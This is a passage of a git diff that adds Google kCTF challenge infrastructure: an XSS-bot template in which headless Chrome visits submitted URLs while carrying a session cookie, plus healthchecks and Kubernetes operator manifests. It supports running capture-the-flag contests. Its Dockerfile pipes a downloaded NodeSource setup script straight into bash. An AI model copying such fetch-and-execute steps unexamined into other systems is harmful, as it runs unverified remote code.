+# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import http.server + +class HealthzHandler(http.server.BaseHTTPRequestHandler): + def do_GET(self): + if self.path != '/healthz': + self.send_response(404) + self.send_header("Content-length", "0") + self.end_headers() + return + + content = b'err' + try: + with open('/tmp/healthz', 'rb') as fd: + content = fd.read().strip() + except: + pass + self.send_response(200 if content == b'ok' else 400) + self.send_header("Content-type", "text/plain") + self.send_header("Content-length", str(len(content))) + self.end_headers() + self.wfile.write(content) + +httpd = http.server.HTTPServer(('', 45281), HealthzHandler) +httpd.serve_forever() diff --git a/v8ctf/kctf/challenge-templates/xss-bot/README.md b/v8ctf/kctf/challenge-templates/xss-bot/README.md new file mode 100644 index 00000000..9509de44 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/README.md @@ -0,0 +1,5 @@ += Example XSS Bot = + +This bot will read a url from the user and then connect to it using chrome (puppeteer). +For the simplest setup, it should be enough to modify the `challenge/cookie` +file and deploy. diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge.yaml b/v8ctf/kctf/challenge-templates/xss-bot/challenge.yaml new file mode 100644 index 00000000..c507b09a --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge.yaml @@ -0,0 +1,19 @@ +apiVersion: kctf.dev/v1 +kind: Challenge +metadata: + name: xss-bot +spec: + deployed: true + powDifficultySeconds: 0 + network: + public: false + healthcheck: + # TIP: disable the healthcheck during development + enabled: true + # You can allow the bot to connect to other challenges internally. + # This can be useful during testing so that you don't have to make your + # challenge public. + # The challenge will be reachable at $name.default.svc.cluster.local or + # simply at $name with the default k8s search list. + #allowConnectTo: + # - otherchallenge diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge/.puppeteerrc.cjs b/v8ctf/kctf/challenge-templates/xss-bot/challenge/.puppeteerrc.cjs new file mode 100644 index 00000000..83615455 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge/.puppeteerrc.cjs @@ -0,0 +1,11 @@ + +const {join} = require('path'); + + +/** + * @type {import("puppeteer").Configuration} + */ +module.exports = { + // Changes the cache location for Puppeteer. + cacheDirectory: join(__dirname, ".cache", "puppeteer"), +}; diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge/Dockerfile b/v8ctf/kctf/challenge-templates/xss-bot/challenge/Dockerfile new file mode 100644 index 00000000..46acfa1e --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge/Dockerfile @@ -0,0 +1,104 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f + +RUN apt-get update && apt-get install -y gnupg2 wget + +# Install latest chrome dev package and fonts to support major charsets (Chinese, Japanese, Arabic, Hebrew, Thai and a few others) +# Note: this installs the necessary libs to make the bundled version of Chromium that Puppeteer installs, work. +# Deps from https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md#chrome-headless-doesnt-launch-on-unix +# plus libxshmfence1 which seems to be missing +RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \ + && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \ + && wget -q -O - https://deb.nodesource.com/setup_16.x | bash - \ + && apt-get update \ + && DEBIAN_FRONTEND=noninteractive apt-get install -yq --no-install-recommends \ + ca-certificates \ + fonts-liberation \ + libappindicator3-1 \ + libasound2 \ + libatk-bridge2.0-0 \ + libatk1.0-0 \ + libc6 \ + libcairo2 \ + libcups2 \ + libdbus-1-3 \ + libexpat1 \ + libfontconfig1 \ + libgbm1 \ + libgcc1 \ + libglib2.0-0 \ + libgtk-3-0 \ + libnspr4 \ + libnss3 \ + libpango-1.0-0 \ + libpangocairo-1.0-0 \ + libstdc++6 \ + libx11-6 \ + libx11-xcb1 \ + libxcb1 \ + libxcomposite1 \ + libxcursor1 \ + libxdamage1 \ + libxext6 \ + libxfixes3 \ + libxi6 \ + libxrandr2 \ + libxrender1 \ + libxshmfence1 \ + libxss1 \ + libxtst6 \ + lsb-release \ + wget \ + xdg-utils \ + nodejs \ + && rm -rf /var/lib/apt/lists/* + +COPY bot.js /home/user/ +COPY cookie /home/user/ +COPY .puppeteerrc.cjs /home/user/ +RUN cd /home/user && npm install puppeteer + +ENV DOMAIN="www.example.com" +# Hosting multiple web challenges same-site to each other can lead to +# unintended solutions. E.g. an xss on a.foo.com will be able to overwrite +# cookies on b.foo.com. +# To prevent this, we can block chrome from accessing any subdomains under +# foo.com except for the real challenge domain using a PAC script. +# Unfortunately, PAC will not work in chrome headless mode, so this will use +# more resources. +ENV BLOCK_SUBORIGINS="1" +ENV REGISTERED_DOMAIN="example.com" + +RUN if [ "${BLOCK_SUBORIGINS}" = "1" ]; then \ + apt-get update \ + && apt-get install -yq --no-install-recommends xvfb \ + && rm -rf /var/lib/apt/lists/*; \ + fi +RUN sed -i -e "s/DOMAIN_SET_IN_DOCKERFILE/${DOMAIN}/" /home/user/cookie + +CMD kctf_setup && \ + mount -t tmpfs none /tmp && \ + mkdir /tmp/chrome-userdata && chmod o+rwx /tmp/chrome-userdata && \ + while true; do \ + if [ "${BLOCK_SUBORIGINS}" = "1" ]; then \ + kctf_drop_privs env BLOCK_SUBORIGINS="${BLOCK_SUBORIGINS}" DOMAIN="${DOMAIN}" REGISTERED_DOMAIN="${REGISTERED_DOMAIN}" xvfb-run /usr/bin/node /home/user/bot.js; \ + else \ + kctf_drop_privs env BLOCK_SUBORIGINS="${BLOCK_SUBORIGINS}" DOMAIN="${DOMAIN}" REGISTERED_DOMAIN="${REGISTERED_DOMAIN}" /usr/bin/node /home/user/bot.js; \ + fi; \ + done & \ + kctf_drop_privs \ + socat \ + TCP-LISTEN:1337,reuseaddr,fork \ + EXEC:"kctf_pow socat STDIN TCP\:localhost\:1338" diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge/bot.js b/v8ctf/kctf/challenge-templates/xss-bot/challenge/bot.js new file mode 100755 index 00000000..88dc51f3 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge/bot.js @@ -0,0 +1,91 @@ +const puppeteer = require('puppeteer'); +const fs = require('fs'); +const net = require('net'); + +const DOMAIN = process.env.DOMAIN; +if (DOMAIN == undefined) throw 'domain undefined' +const REGISTERED_DOMAIN = process.env.REGISTERED_DOMAIN; +const BLOCK_SUBORIGINS = process.env.BLOCK_SUBORIGINS == "1"; +const BOT_TIMEOUT = process.env.BOT_TIMEOUT || 60*1000; + +// will only be used if BLOCK_SUBORIGINS is enabled +const PAC_B64 = Buffer.from(` +function FindProxyForURL (url, host) { + if (host == "${DOMAIN}") { + return 'DIRECT'; + } + if (host == "${REGISTERED_DOMAIN}" || dnsDomainIs(host, ".${REGISTERED_DOMAIN}")) { + return 'PROXY 127.0.0.1:1'; + } + return 'DIRECT'; +} +`).toString('base64'); +const puppeter_args = {}; +if (BLOCK_SUBORIGINS) { + puppeter_args.headless = false; + puppeter_args.args = [ + '--user-data-dir=/tmp/chrome-userdata', + '--breakpad-dump-location=/tmp/chrome-crashes', + '--proxy-pac-url=data:application/x-ns-proxy-autoconfig;base64,'+PAC_B64, + ]; +} + +(async function(){ + const browser = await puppeteer.launch(puppeter_args); + + function ask_for_url(socket) { + socket.state = 'URL'; + socket.write('Please send me a URL to open.\n'); + } + + async function load_url(socket, data) { + let url = data.toString().trim(); + console.log(`checking url: ${url}`); + if (!url.startsWith('http://') && !url.startsWith('https://')) { + socket.state = 'ERROR'; + socket.write('Invalid scheme (http/https only).\n'); + socket.destroy(); + return; + } + socket.state = 'LOADED'; + let cookie = JSON.parse(fs.readFileSync('/home/user/cookie')); + + const context = await browser.createIncognitoBrowserContext(); + const page = await context.newPage(); + await page.setCookie(cookie); + socket.write(`Loading page ${url}.\n`); + setTimeout(()=>{ + try { + context.close(); + socket.write('timeout\n'); + socket.destroy(); + } catch (err) { + console.log(`err: ${err}`); + } + }, BOT_TIMEOUT); + await page.goto(url); + } + + var server = net.createServer(); + server.listen(1338); + console.log('listening on port 1338'); + + server.on('connection', socket=>{ + socket.on('data', data=>{ + try { + if (socket.state == 'URL') { + load_url(socket, data); + } + } catch (err) { + console.log(`err: ${err}`); + } + }); + + try { + ask_for_url(socket); + } catch (err) { + console.log(`err: ${err}`); + } + }); +})(); + diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge/cookie b/v8ctf/kctf/challenge-templates/xss-bot/challenge/cookie new file mode 100644 index 00000000..24871dc7 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge/cookie @@ -0,0 +1,9 @@ +{ + "name": "session", + "value": "aiy3Uushcha4Zuzu", + "domain": "DOMAIN_SET_IN_DOCKERFILE", + "url": "https://DOMAIN_SET_IN_DOCKERFILE/", + "path": "/", + "httpOnly": true, + "secure": true +} diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/Dockerfile b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/Dockerfile new file mode 100644 index 00000000..2df56306 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/Dockerfile @@ -0,0 +1,18 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +FROM gcr.io/kctf-docker/healthcheck@sha256:6709709a8cfd6e2d743c86d58398c00ca4eb26befd3b1a0a629ab35f91e98ef0 + +COPY healthcheck_loop.sh healthcheck.py healthz_webserver.py /home/user/ + +CMD kctf_drop_privs /home/user/healthcheck_loop.sh & /home/user/healthz_webserver.py diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/README.md b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/README.md new file mode 100644 index 00000000..8dbcd6a8 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/README.md @@ -0,0 +1,14 @@ +# Healthcheck + +kCTF checks the health of challenges by accessing the healthcheck via +http://host:45281/healthz which needs to return either 200 ok or an error +depending on the status of the challenge. + +The default healthcheck consists of: +* a loop that repeatedly calls a python script and writes the status to a file +* a webserver that checks the file and serves /healthz +* the actual healthcheck code using pwntools for convenience + +To modify it, you will likely only have to change the script in healthcheck.py. +You can test if the challenge replies as expected or better add a full example +solution that will try to get the flag from the challenge. diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck.py b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck.py new file mode 100755 index 00000000..62b34457 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import socket +from pwn import * + +r = remote('127.0.0.1', 1337) +l = listen() + +r.readuntil(b'URL to open.', timeout=10) +r.send(bytes('http://localhost:{}/ok'.format(l.lport), 'ascii')) + +_ = l.wait_for_connection() +l.readuntil(b'GET /ok HTTP/1.1') +l.send(b'HTTP/1.1 200 OK\nContent-Length: 0\n\n') + +exit (0) diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck_loop.sh b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck_loop.sh new file mode 100755 index 00000000..acf69158 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck_loop.sh @@ -0,0 +1,32 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +set -Eeuo pipefail + +TIMEOUT=20 +PERIOD=30 + +export TERM=linux +export TERMINFO=/etc/terminfo + +while true; do + echo -n "[$(date)] " + if timeout "${TIMEOUT}" /home/user/healthcheck.py; then + echo 'ok' | tee /tmp/healthz + else + echo -n "$? " + echo 'err' | tee /tmp/healthz + fi + sleep "${PERIOD}" +done diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthz_webserver.py b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthz_webserver.py new file mode 100755 index 00000000..62cf0198 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthz_webserver.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import http.server + +class HealthzHandler(http.server.BaseHTTPRequestHandler): + def do_GET(self): + if self.path != '/healthz': + self.send_response(404) + self.send_header("Content-length", "0") + self.end_headers() + return + + content = b'err' + try: + with open('/tmp/healthz', 'rb') as fd: + content = fd.read().strip() + except: + pass + self.send_response(200 if content == b'ok' else 400) + self.send_header("Content-type", "text/plain") + self.send_header("Content-length", str(len(content))) + self.end_headers() + self.wfile.write(content) + +httpd = http.server.HTTPServer(('', 45281), HealthzHandler) +httpd.serve_forever() diff --git a/v8ctf/kctf/resources/kctf-operator-controller-manager-metrics-service_v1_service.yaml b/v8ctf/kctf/resources/kctf-operator-controller-manager-metrics-service_v1_service.yaml new file mode 100644 index 00000000..c226cb87 --- /dev/null +++ b/v8ctf/kctf/resources/kctf-operator-controller-manager-metrics-service_v1_service.yaml @@ -0,0 +1,17 @@ +apiVersion: v1 +kind: Service +metadata: + creationTimestamp: null + labels: + control-plane: controller-manager + name: kctf-operator-controller-manager-metrics-service +spec: + ports: + - name: https + port: 8443 + protocol: TCP + targetPort: https + selector: + control-plane: controller-manager +status: + loadBalancer: {} diff --git a/v8ctf/kctf/resources/kctf-operator-manager-config_v1_configmap.yaml b/v8ctf/kctf/resources/kctf-operator-manager-config_v1_configmap.yaml new file mode 100644 index 00000000..121d2791 --- /dev/null +++ b/v8ctf/kctf/resources/kctf-operator-manager-config_v1_configmap.yaml @@ -0,0 +1,17 @@ +apiVersion: v1 +data: + controller_manager_config.yaml: | + apiVersion: controller-runtime.sigs.k8s.io/v1alpha1 + kind: ControllerManagerConfig + health: + healthProbeBindAddress: :8081 + metrics: + bindAddress: 127.0.0.1:8080 + webhook: + port: 9443 + leaderElection: + leaderElect: true + resourceName: 558d99b6.dev +kind: ConfigMap +metadata: + name: kctf-operator-manager-config diff --git a/v8ctf/kctf/resources/kctf-operator-metrics-reader_rbac.authorization.k8s.io_v1_clusterrole.yaml b/v8ctf/kctf/resources/kctf-operator-metrics-reader_rbac.authorization.k8s.io_v1_clusterrole.yaml new file mode 100644 index 00000000..8701a21e --- /dev/null +++ b/v8ctf/kctf/resources/kctf-operator-metrics-reader_rbac.authorization.k8s.io_v1_clusterrole.yaml @@ -0,0 +1,10 @@ +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + creationTimestamp: null + name: kctf-operator-metrics-reader +rules: +- nonResourceURLs: + - /metrics + verbs: + - get diff --git a/v8ctf/kctf/resources/kctf-operator.clusterserviceversion.yaml b/v8ctf/kctf/resources/kctf-operator.clusterserviceversion.yaml new file mode 100644 index 00000000..4e1fe52c --- /dev/null +++ b/v8ctf/kctf/resources/kctf-operator.clusterserviceversion.yaml @@ -0,0 +1,415 @@ +apiVersion: operators.coreos.com/v1alpha1 +kind: ClusterServiceVersion +metadata: + annotations: + alm-examples: |- + [ + { + "apiVersion": "kctf.dev/v1", + "kind": "Challenge", + "metadata": { + "name": "challenge-sample" + }, + "spec": null + } + ] + capabilities: Basic Install + operators.operatorframework.io/builder: operator-sdk-v1.17.0+git + operators.operatorframework.io/project_layout: go.kubebuilder.io/v3 + name: kctf-operator.v0.0.1 + namespace: placeholder +spec: + apiservicedefinitions: {} + customresourcedefinitions: + owned: + - description: Challenge is the Schema for the challenges API + displayName: Challenge + kind: Challenge + name: challenges.kctf.dev + version: v1 + description: Operator for KCTF + displayName: kctf-operator + icon: + - base64data: "" + mediatype: "" + install: + spec: + clusterPermissions: + - rules: + - apiGroups: + - apps + resources: + - daemonsets + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - apps + resources: + - deployments + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - autoscaling + resources: + - horizontalpodautoscalers + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - cloud.google.com + resources: + - backendconfigs + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - configmaps + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - endpoints + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - nodes + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - persistentvolumeclaims + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - persistentvolumes + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - pods + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - secrets + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - services + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - extensions + resources: + - ingresses + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - kctf.dev + resources: + - challenges + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - kctf.dev + resources: + - challenges/finalizers + verbs: + - update + - apiGroups: + - kctf.dev + resources: + - challenges/status + verbs: + - get + - patch + - update + - apiGroups: + - networking.gke.io + resources: + - managedcertificates + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - networking.k8s.io + resources: + - ingresses + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - networking.k8s.io + resources: + - networkpolicies + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterrolebindings + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterroles + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - authentication.k8s.io + resources: + - tokenreviews + verbs: + - create + - apiGroups: + - authorization.k8s.io + resources: + - subjectaccessreviews + verbs: + - create + serviceAccountName: kctf-operator-controller-manager + deployments: + - name: kctf-operator-controller-manager + spec: + replicas: 1 + selector: + matchLabels: + control-plane: controller-manager + strategy: {} + template: + metadata: + labels: + control-plane: controller-manager + spec: + containers: + - args: + - --secure-listen-address=0.0.0.0:8443 + - --upstream=http://127.0.0.1:8080/ + - --logtostderr=true + - --v=10 + image: gcr.io/kubebuilder/kube-rbac-proxy:v0.8.0 + name: kube-rbac-proxy + ports: + - containerPort: 8443 + name: https + protocol: TCP + resources: {} + - args: + - --health-probe-bind-address=:8081 + - --metrics-bind-address=127.0.0.1:8080 + - --leader-elect + command: + - /manager + env: + - name: ALLOWED_IPS + value: 0.0.0.0/0 + - name: SECURITY_POLICY + value: kctf-policy + + image: eu.gcr.io/kctf-testing/kctf-operator:dev + livenessProbe: + httpGet: + path: /healthz + port: 8081 + initialDelaySeconds: 15 + periodSeconds: 20 + name: manager + readinessProbe: + httpGet: + path: /readyz + port: 8081 + initialDelaySeconds: 5 + periodSeconds: 10 + resources: + limits: + cpu: 200m + memory: 100Mi + requests: + cpu: 100m + memory: 20Mi + securityContext: + allowPrivilegeEscalation: false + securityContext: + runAsNonRoot: true + serviceAccountName: kctf-operator-controller-manager + terminationGracePeriodSeconds: 10 + permissions: + - rules: + - apiGroups: + - "" + resources: + - configmaps + verbs: + - get + - list + - watch + - create + - update + - patch + - delete + - apiGroups: + - coordination.k8s.io + resources: + - leases + verbs: + - get + - list + - watch + - create + - update + - patch + - delete + - apiGroups: + - "" + resources: + - events + verbs: + - create + - patch + serviceAccountName: kctf-operator-controller-manager + strategy: deployment + installModes: + - supported: false + type: OwnNamespace + - supported: false + type: SingleNamespace + - supported: false + type: MultiNamespace + - supported: true + type: AllNamespaces + keywords: + - kctf + links: + - name: Kctf Operator + url: https://kctf-operator.domain + maintainers: + - email: kctf@google.com + name: kctf + maturity: alpha + provider: + name: Google + url: http://kctf.dev + version: 0.0.1 diff --git a/v8ctf/kctf/resources/kctf.dev_challenges.yaml b/v8ctf/kctf/resources/kctf.dev_challenges.yaml new file mode 100644 index 00000000..dfeb42c5 --- /dev/null +++ b/v8ctf/kctf/resources/kctf.dev_challenges.yaml @@ -0,0 +1,7357 @@ +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + annotations: + controller-gen.kubebuilder.io/version: v0.7.0 + creationTimestamp: null + name: challenges.kctf.dev +spec: + group: kctf.dev + names: + kind: Challenge + listKind: ChallengeList + plural: challenges + singular: challenge + scope: Namespaced + versions: + - additionalPrinterColumns: + - jsonPath: .status.health + name: Health + type: string + - jsonPath: .status.status + name: Status + type: string + - jsonPath: .spec.deployed + name: Deployed + type: boolean + - jsonPath: .spec.network.public + name: Public + type: boolean + name: v1 + schema: + openAPIV3Schema: + description: Challenge is the Schema for the challenges API + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: ChallengeSpec defines the desired state of Challenge + properties: + allowConnectTo: + items: + type: string + type: array + deployed: + default: false + description: Shows if the challenge is ready to be deployed, if not, + it sets the replicas to 0 and disables services/ingress + type: boolean + healthcheck: + description: Healthcheck checks if the challenge works If empty, healthcheck + is not enabled by default + properties: + enabled: + default: false + type: boolean + image: + default: healthcheck + description: Image for the healthcheck container + type: string + type: object + horizontalPodAutoscalerSpec: + description: Autoscaling features determine quantity of replicas and + CPU utilization If empty, autoscaling is not enabled by default + properties: + maxReplicas: + description: upper limit for the number of pods that can be set + by the autoscaler; cannot be smaller than MinReplicas. + format: int32 + type: integer + minReplicas: + description: minReplicas is the lower limit for the number of + replicas to which the autoscaler can scale down. It defaults + to 1 pod. minReplicas is allowed to be 0 if the alpha feature + gate HPAScaleToZero is enabled and at least one Object or External + metric is configured. Scaling is active as long as at least + one metric value is available. + format: int32 + type: integer + targetCPUUtilizationPercentage: + description: target average CPU utilization (represented as a + percentage of requested CPU) over all the pods; if not specified + the default autoscaling policy will be used. + format: int32 + type: integer + required: + - maxReplicas + type: object + image: + default: challenge + description: Image used by the deployment + type: string + network: + description: 'The network specifications: if it''s public or not and + specifications about ports' + properties: + ports: + description: By default, one port is set with default values + items: + properties: + domains: + description: Extra domains for managed certificates. Only + used for type HTTPS. + items: + type: string + type: array + name: + description: Name of the port + type: string + port: + description: Port + format: int32 + type: integer + protocol: + default: TCP + description: Protocol is not optional + type: string + targetPort: + anyOf: + - type: integer + - type: string + description: TargetPort is not optional + x-kubernetes-int-or-string: true + required: + - protocol + - targetPort + type: object + type: array + public: + default: false + type: boolean + type: object + persistentVolumeClaims: + description: Names of the desired PersistentVolumeClaims + items: + type: string + type: array + podTemplate: + description: PodTemplate is used to set the template for the deployment's + pod, so that an author can add volumeMounts and other extra features + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this + representation of an object. Servers should convert recognized + schemas to the latest internal value, and may reject unrecognized + values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource + this object represents. Servers may infer this from the endpoint + the client submits requests to. Cannot be updated. In CamelCase. + More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + description: 'Standard object''s metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata' + type: object + template: + description: Template defines the pods that will be created from + this pod template. https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + properties: + metadata: + description: 'Standard object''s metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata' + type: object + spec: + description: 'Specification of the desired behavior of the + pod. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status' + properties: + activeDeadlineSeconds: + description: Optional duration in seconds the pod may + be active on the node relative to StartTime before the + system will actively try to mark it failed and kill + associated containers. Value must be a positive integer. + format: int64 + type: integer + affinity: + description: If specified, the pod's scheduling constraints + properties: + nodeAffinity: + description: Describes node affinity scheduling rules + for the pod. + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule + pods to nodes that satisfy the affinity expressions + specified by this field, but it may choose a + node that violates one or more of the expressions. + The node that is most preferred is the one with + the greatest sum of weights, i.e. for each node + that meets all of the scheduling requirements + (resource request, requiredDuringScheduling + affinity expressions, etc.), compute a sum by + iterating through the elements of this field + and adding "weight" to the sum if the node matches + the corresponding matchExpressions; the node(s) + with the highest sum are the most preferred. + items: + description: An empty preferred scheduling term + matches all objects with implicit weight 0 + (i.e. it's a no-op). A null preferred scheduling + term matches no objects (i.e. is also a no-op). + properties: + preference: + description: A node selector term, associated + with the corresponding weight. + properties: + matchExpressions: + description: A list of node selector + requirements by node's labels. + items: + description: A node selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: The label key that + the selector applies to. + type: string + operator: + description: Represents a key's + relationship to a set of values. + Valid operators are In, NotIn, + Exists, DoesNotExist. Gt, and + Lt. + type: string + values: + description: An array of string + values. If the operator is In + or NotIn, the values array must + be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + If the operator is Gt or Lt, + the values array must have a + single element, which will be + interpreted as an integer. This + array is replaced during a strategic + merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchFields: + description: A list of node selector + requirements by node's fields. + items: + description: A node selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: The label key that + the selector applies to. + type: string + operator: + description: Represents a key's + relationship to a set of values. + Valid operators are In, NotIn, + Exists, DoesNotExist. Gt, and + Lt. + type: string + values: + description: An array of string + values. If the operator is In + or NotIn, the values array must + be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + If the operator is Gt or Lt, + the values array must have a + single element, which will be + interpreted as an integer. This + array is replaced during a strategic + merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + type: object + weight: + description: Weight associated with matching + the corresponding nodeSelectorTerm, in + the range 1-100. + format: int32 + type: integer + required: + - preference + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the affinity requirements specified + by this field are not met at scheduling time, + the pod will not be scheduled onto the node. + If the affinity requirements specified by this + field cease to be met at some point during pod + execution (e.g. due to an update), the system + may or may not try to eventually evict the pod + from its node. + properties: + nodeSelectorTerms: + description: Required. A list of node selector + terms. The terms are ORed. + items: + description: A null or empty node selector + term matches no objects. The requirements + of them are ANDed. The TopologySelectorTerm + type implements a subset of the NodeSelectorTerm. + properties: + matchExpressions: + description: A list of node selector + requirements by node's labels. + items: + description: A node selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: The label key that + the selector applies to. + type: string + operator: + description: Represents a key's + relationship to a set of values. + Valid operators are In, NotIn, + Exists, DoesNotExist. Gt, and + Lt. + type: string + values: + description: An array of string + values. If the operator is In + or NotIn, the values array must + be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + If the operator is Gt or Lt, + the values array must have a + single element, which will be + interpreted as an integer. This + array is replaced during a strategic + merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchFields: + description: A list of node selector + requirements by node's fields. + items: + description: A node selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: The label key that + the selector applies to. + type: string + operator: + description: Represents a key's + relationship to a set of values. + Valid operators are In, NotIn, + Exists, DoesNotExist. Gt, and + Lt. + type: string + values: + description: An array of string + values. If the operator is In + or NotIn, the values array must + be non-empty. If the 